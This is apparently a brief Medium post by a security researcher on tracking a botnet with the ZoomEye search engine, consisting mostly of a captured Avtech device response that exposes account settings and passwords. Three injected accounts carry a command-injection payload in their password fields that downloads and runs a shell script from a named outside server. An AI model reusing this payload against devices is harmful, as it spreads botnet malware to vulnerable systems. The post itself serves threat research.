A case of tracking botnet using ZoomEye

HTTP/1.1 200 OK
Date: Thu, 04 Jul 2019 16:11:40 GMT
Server: Linux/2.x UPnP/1.0 Avtech/1.0
Connection: close
Last-Modified: Wed, 26 Jun 2019 13:07:09 GMT
Content-Type: text/plain
ETag: 37-2410-1561554429
Content-Length: 2410

<Account>
<Maxuser Level="40/40">10</Maxuser>
<LocalPassword Level="40/40">0000</LocalPassword>
<OperatorPassword Level="40/40">0000</OperatorPassword>
<AnonymousLogin Level="40/40" Dispatch="account">DISABLE</AnonymousLogin>
<AdvenceUserLevel Level="40/40">OFF</AdvenceUserLevel>
<User1>
<Username Level="40/40">admin</Username>
<Password Level="40/40">260879jimi</Password>
<Level Level="40/40">SUPERVISOR</Level>
<Lifetime Level="40/40">INFINITE</Lifetime>
<PhoneNum1 Level="40/40" />
<PhoneNum2 Level="40/40" />
<PhoneNum3 Level="40/40" />
<IDCode Level="" />
</User1>
<User2>
<Username Level="40/40" Dispatch="account">eddy</Username>
<Password Level="40/40" Dispatch="account">123456</Password>
<Level Level="40/40" Dispatch="account">POWER USER</Level>
<Lifetime Level="40/40" Dispatch="account">INFINITE</Lifetime>
</User2>
<User3>
<Username Level="40/40" Dispatch="account">user</Username>
<Password Level="40/40" Dispatch="account">123456</Password>
<Level Level="40/40" Dispatch="account">POWER USER</Level>
<Lifetime Level="40/40" Dispatch="account">INFINITE</Lifetime>
</User3>
<User4>
<Username Level="40/40" Dispatch="account">maxposts</Username>
<Password Level="40/40" Dispatch="account">;cd /tmp;wget http://222.186.52.155:21541/sh/AV.sh -O AV.sh;chmod 777 AV.sh;sh AV.sh;</Password>
<Level Level="40/40" Dispatch="account">SUPERVISOR</Level>
<Lifetime Level="40/40" Dispatch="account">5 MIN</Lifetime>
</User4>
<User5>
<Username Level="40/40" Dispatch="account">qmcxcfk</Username>
<Password Level="40/40" Dispatch="account">;cd /tmp;wget http://222.186.52.155:21541/sh/AV.sh -O AV.sh;chmod 777 AV.sh;sh AV.sh;</Password>
<Level Level="40/40" Dispatch="account">SUPERVISOR</Level>
<Lifetime Level="40/40" Dispatch="account">5 MIN</Lifetime>
</User5>
<User6>
<Username Level="40/40" Dispatch="account">xqmcxcfk</Username>
<Password Level="40/40" Dispatch="account">;cd /tmp;wget http://222.186.52.155:21541/sh/AV.sh -O AV.sh;chmod 777 AV.sh;sh AV.sh;</Password>
<Level Level="40/40" Dispatch="account">SUPERVISOR</Level>
<Lifetime Level="40/40" Dispatch="account">5 MIN</Lifetime>
</User6>
</Account>

--

--

--

The Leader of the KnownSec 404 Team ( ZoomEye http://www.zoomeye.org SeeBug http://www.seebug.org KCon http://kcon.knownsec.com)

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Floyd’s Tortoise and Hare Algorithm — for beginners

Android fundamentals 10.1

How to use Docker Swarm secrets to store and rotate your SSL certificates with Nginx reverse proxy

The difference between DevOps and SRE

THE DIFFERENCE BETWEEN A CLASS AND AN ID SELECTOR.

How Should You Estimate Software Development Cost?

MS Access: Update table with subqueries including multiple joins

Strong Typing is for People With Weak Memories

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
heige

heige

The Leader of the KnownSec 404 Team ( ZoomEye http://www.zoomeye.org SeeBug http://www.seebug.org KCon http://kcon.knownsec.com)

More from Medium

3 Machine lab — 2. ASM for Active directory

Improving Wireline Service Supply Chain Workflows with Automation

MremoteNG External Tool Configurations

Accessing Google Cloud Storage via SFTP